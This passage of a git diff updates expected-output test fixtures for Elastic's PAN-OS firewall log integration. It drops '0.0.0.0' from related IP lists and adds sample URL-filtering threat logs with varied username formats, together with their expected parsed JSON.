"ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -2028,8 +2012,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -2149,8 +2132,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -2270,8 +2252,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -2391,8 +2372,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -2512,8 +2492,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -2633,8 +2612,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -2754,8 +2732,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -2875,8 +2852,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -2996,8 +2972,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -3117,8 +3092,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -3238,8 +3212,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -3359,8 +3332,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -3480,8 +3452,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -3601,8 +3572,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -3722,8 +3692,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -3843,8 +3812,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -3964,8 +3932,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -4085,8 +4052,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -4206,8 +4172,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -4327,8 +4292,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -4448,8 +4412,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -4569,8 +4532,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -4690,8 +4652,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -4808,8 +4769,7 @@ "related": { "ip": [ "192.168.0.100", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ] }, "rule": { @@ -4920,8 +4880,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -5038,8 +4997,7 @@ "related": { "ip": [ "192.168.0.100", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ] }, "rule": { @@ -5150,8 +5108,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -5271,8 +5228,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -5389,8 +5345,7 @@ "related": { "ip": [ "192.168.0.100", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ] }, "rule": { @@ -5501,8 +5456,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -5622,8 +5576,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -5743,8 +5696,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -5864,8 +5816,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -5985,8 +5936,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -6106,8 +6056,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -6227,8 +6176,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -6348,8 +6296,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -6469,8 +6416,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -6590,8 +6536,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -6711,8 +6656,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -6832,8 +6776,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -6953,8 +6896,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -7074,8 +7016,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -7195,8 +7136,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -7316,8 +7256,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -7437,8 +7376,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -7558,8 +7496,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -7679,8 +7616,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -7800,8 +7736,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -7921,8 +7856,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -8042,8 +7976,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -8163,8 +8096,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -8284,8 +8216,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -8405,8 +8336,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -8526,8 +8456,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -8647,8 +8576,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -8768,8 +8696,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -8889,8 +8816,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -9010,8 +8936,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -9131,8 +9056,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -9252,8 +9176,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -9363,8 +9286,7 @@ "related": { "ip": [ "192.168.0.2", - "192.168.0.1", - "0.0.0.0" + "192.168.0.1" ], "user": [ "crusher" @@ -9484,8 +9406,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -9605,8 +9526,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -9716,8 +9636,7 @@ "related": { "ip": [ "192.168.0.2", - "192.168.0.1", - "0.0.0.0" + "192.168.0.1" ], "user": [ "crusher" @@ -9827,8 +9746,7 @@ "related": { "ip": [ "192.168.0.2", - "192.168.0.1", - "0.0.0.0" + "192.168.0.1" ], "user": [ "crusher" @@ -9948,8 +9866,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -10069,8 +9986,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -10190,8 +10106,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -10311,8 +10226,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -10432,8 +10346,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -10543,8 +10456,7 @@ "related": { "ip": [ "192.168.0.2", - "192.168.0.1", - "0.0.0.0" + "192.168.0.1" ], "user": [ "crusher" @@ -10664,8 +10576,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -10785,8 +10696,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -10906,8 +10816,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -11027,8 +10936,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -11148,8 +11056,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -11269,8 +11176,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -11390,8 +11296,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -11511,8 +11416,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -11622,8 +11526,7 @@ "related": { "ip": [ "192.168.0.2", - "192.168.0.1", - "0.0.0.0" + "192.168.0.1" ], "user": [ "crusher" @@ -11743,8 +11646,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -11864,8 +11766,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -11985,8 +11886,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" diff --git a/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-inc-traffic.json-expected.json b/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-inc-traffic.json-expected.json index 31f3053017d..73dc2990809 100644 --- a/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-inc-traffic.json-expected.json +++ b/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-inc-traffic.json-expected.json @@ -139,8 +139,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -314,7 +313,6 @@ "ip": [ "192.168.0.2", "175.16.199.1", - "0.0.0.0", "127.0.0.1" ], "user": [ @@ -490,7 +488,6 @@ "ip": [ "192.168.0.2", "175.16.199.1", - "0.0.0.0", "127.0.0.1" ], "user": [ diff --git a/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-threat-sample.log b/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-threat-sample.log index 1322da68afb..3a66e5a720d 100644 --- a/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-threat-sample.log +++ b/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-threat-sample.log @@ -187,3 +187,12 @@ Nov 30 16:45:30 PA-220 1,2018/11/30 16:45:29,012801096514,THREAT,url,2049,2018/1 1,2021/11/16 10:10:34,007051000184334,THREAT,spyware,2561,2021/11/16 10:10:34,89.160.20.156,67.43.156.13,81.2.69.193,67.43.156.13,LAn-TO-WAn,,,dns,vsys1,LAN,WAN,ethernet1/2,ethernet1/1,LFPpan,2021/11/16 10:10:34,31373,1,58903,53,26180,53,0x403000,udp,drop-packet,"www.virussign.com",generic:www.virussign.com(327891564),any,medium,client-to-server,7029847907104718942,0x0,United States,United States,,,0,,,0,,,,,,,,0,0,0,0,0,,PA-VM,,,,,0,,0,,N/A,dns-malware,AppThreat-0-0,0x0,0,4294967295,,,5aa3aaa9-610a-433a-8aaa-729378021aaa,0,,,,,,,,,,,,,,,,,,,,,,,,,,,,,0,2021-11-16T10:10:35.294-08:00,,,,infrastructure,networking,network-protocol,3,"used-by-malware,has-known-vulnerability,pervasive-use",,dns,no,no 1,2023/10/04 09:40:58,007058000248010,THREAT,url,2816,2023/10/04 09:40:58,10.1.0.12,192.168.15.224,10.138.0.44,192.168.15.224,reset-adult,,,ssl,vsys1,private,public,ethernet1/2,ethernet1/1,,2023/10/04 09:40:58,763,1,50462,443,15048,443,0x407400,tcp,block-url,"adult.com/",(9999),adult,informational,client-to-server,7286123782408765451,0x0,10.0.0.0-10.255.255.255,United States,,,0,,,0,,,,,,,,0,0,0,0,0,,PA-VM,,,,,0,,0,,N/A,N/A,AppThreat-0-0,0x0,0,4294967295,,"adult,low-risk",73a06abf-75ca-436f-9319-1a15b27fa692,0,,,,,,,,,,,,,,,,,,,,,,,,,,,,,0,2023-10-04T09:40:58.388-07:00,,,,encrypted-tunnel,networking,browser-based,4,"used-by-malware,able-to-transfer-file,has-known-vulnerability,tunnel-other-application,pervasive-use",,ssl,no,no,,,NonProxyTraffic 1,2023/10/04 09:40:43,007058000248010,THREAT,url,2816,2023/10/04 09:40:43,10.1.0.12,192.168.15.224,10.138.0.44,192.168.15.224,block-sports,,,web-browsing,vsys1,private,public,ethernet1/2,ethernet1/1,elastic,2023/10/04 09:40:43,730,1,54344,80,1618,80,0x407000,tcp,block-url,"www.espn.com/",(9999),sports,informational,client-to-server,7286123782408765449,0x0,10.0.0.0-10.255.255.255,United States,,,0,,,1,,,,,,,,0,0,0,0,0,,PA-VM,,,,get,0,,0,,N/A,N/A,AppThreat-0-0,0x0,0,4294967295,,"sports,low-risk",eb5b9cd9-716b-4729-a5de-9033f4c5aa4f,0,,,,,,,,,,,,,,,,,,,,,,,,,,,,,0,2023-10-04T09:40:43.387-07:00,,,,internet-utility,general-internet,browser-based,4,"used-by-malware,able-to-transfer-file,has-known-vulnerability,tunnel-other-application,pervasive-use",,web-browsing,no,no,,,NonProxyTraffic +Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,src-domainname\src_username,dst-domainname\dst_username,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28191,1,52984,443,37679,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7726,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,nt-autorit..t\src_username,nt-autorit..t\dst_username,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28191,1,52984,443,37679,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7726,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,.\src_username,.\dst_username,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28191,1,52984,443,37679,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7726,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,src-domainname\\src_username,dst-domainname\\dst_username,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28191,1,52984,443,37679,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7726,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,src_username@src-domainname,dst_username@dst-domainname,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28191,1,52984,443,37679,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7726,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,src_username,dst_username,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28191,1,52984,443,37679,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7726,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,x-fwd-for: 10.10.10.50,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28191,1,52984,443,37679,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7726,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,src_domainname\\src-user#name,dst_domainname\\dst-user#name,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28191,1,52984,443,37679,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7726,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,src_domain..name\\src-user#name,dst_domain..name\\dst-user#name,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28191,1,52984,443,37679,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7726,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, diff --git a/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-threat-sample.log-expected.json b/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-threat-sample.log-expected.json index 9fbcf37d2f0..e29396b147b 100644 --- a/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-threat-sample.log-expected.json +++ b/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-threat-sample.log-expected.json @@ -32599,6 +32599,1580 @@ "original": "www.espn.com/", "path": "/" } + }, + { + "@timestamp": "2018-11-30T16:44:36.000+09:30", + "destination": { + "domain": "consent.cmp.oath.com", + "geo": { + "city_name": "Changchun", + "continent_name": "Asia", + "country_iso_code": "CN", + "country_name": "China", + "location": { + "lat": 43.88, + "lon": 125.3228 + }, + "name": "United States", + "region_iso_code": "CN-22", + "region_name": "Jilin Sheng" + }, + "ip": "175.16.199.1", + "nat": { + "ip": "175.16.199.1", + "port": 443 + }, + "port": 443, + "user": { + "domain": "dst-domainname", + "name": "dst_username" + } + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "url_filtering", + "category": [ + "intrusion_detection", + "threat", + "network" + ], + "created": "2018-11-30T16:44:36.000+09:30", + "kind": "alert", + "original": "Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,src-domainname\\src_username,dst-domainname\\dst_username,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28191,1,52984,443,37679,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7726,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "outcome": "failure", + "severity": 5, + "timezone": "+09:30", + "type": [ + "denied" + ] + }, + "labels": { + "nat_translated": true, + "temporary_match": true + }, + "log": { + "level": "informational" + }, + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,src-domainname\\src_username,dst-domainname\\dst_username,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28191,1,52984,443,37679,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7726,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "network": { + "application": "ssl", + "community_id": [ + "1:uw+iNVMmjYN9VAmQZQDw4+dyarA=", + "1:JXH5QeRl6+F+lTj/JOTAPn5Yegk=" + ], + "direction": "inbound", + "transport": "tcp", + "type": "ipv4" + }, + "observer": { + "egress": { + "interface": { + "name": "ethernet1/1" + }, + "zone": "untrust" + }, + "hostname": "PA-220", + "ingress": { + "interface": { + "name": "ethernet1/2" + }, + "zone": "trust" + }, + "product": "PAN-OS", + "serial_number": "012801096514", + "type": "firewall", + "vendor": "Palo Alto Networks" + }, + "panw": { + "panos": { + "action": "block-url", + "action_flags": "0x2000000000000000", + "content_version": "AppThreat-0-0", + "device_group_hierarchy1": "0", + "device_group_hierarchy2": "0", + "device_group_hierarchy3": "0", + "device_group_hierarchy4": "0", + "flow_id": "28191", + "imsi": "0", + "log_profile": "send_to_mac", + "logged_time": "2018-11-30T16:44:36.000+09:30", + "network": { + "nat": { + "community_id": "1:JXH5QeRl6+F+lTj/JOTAPn5Yegk=" + } + }, + "parent_session": { + "id": "0" + }, + "payload_protocol_id": "4294967295", + "repeat_count": 1, + "ruleset": "new_outbound_from_trust", + "sctp": { + "assoc_id": "0" + }, + "sequence_number": "7726", + "sub_type": "url", + "threat": { + "id": "9999", + "name": "URL-filtering" + }, + "threat_category": "unknown", + "tunnel_type": "N/A", + "type": "THREAT", + "url": { + "category": "business-and-economy" + }, + "url_idx": "0", + "virtual_sys": "vsys1", + "wildfire": { + "report_id": "0" + } + } + }, + "related": { + "hosts": [ + "PA-220" + ], + "ip": [ + "192.168.15.224", + "175.16.199.1", + "192.168.1.63" + ], + "user": [ + "src_username", + "dst_username" + ] + }, + "rule": { + "name": "new_outbound_from_trust" + }, + "source": { + "geo": { + "name": "192.168.0.0-192.168.255.255" + }, + "ip": "192.168.15.224", + "nat": { + "ip": "192.168.1.63", + "port": 37679 + }, + "port": 52984, + "user": { + "domain": "src-domainname", + "name": "src_username" + } + }, + "tags": [ + "preserve_original_event" + ], + "url": { + "domain": "consent.cmp.oath.com", + "original": "consent.cmp.oath.com/", + "path": "/" + }, + "user": { + "domain": "src-domainname", + "name": "src_username" + } + }, + { + "@timestamp": "2018-11-30T16:44:36.000+09:30", + "destination": { + "domain": "consent.cmp.oath.com", + "geo": { + "city_name": "Changchun", + "continent_name": "Asia", + "country_iso_code": "CN", + "country_name": "China", + "location": { + "lat": 43.88, + "lon": 125.3228 + }, + "name": "United States", + "region_iso_code": "CN-22", + "region_name": "Jilin Sheng" + }, + "ip": "175.16.199.1", + "nat": { + "ip": "175.16.199.1", + "port": 443 + }, + "port": 443, + "user": { + "domain": "nt-autorit..t", + "name": "dst_username" + } + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "url_filtering", + "category": [ + "intrusion_detection", + "threat", + "network" + ], + "created": "2018-11-30T16:44:36.000+09:30", + "kind": "alert", + "original": "Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,nt-autorit..t\\src_username,nt-autorit..t\\dst_username,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28191,1,52984,443,37679,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7726,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "outcome": "failure", + "severity": 5, + "timezone": "+09:30", + "type": [ + "denied" + 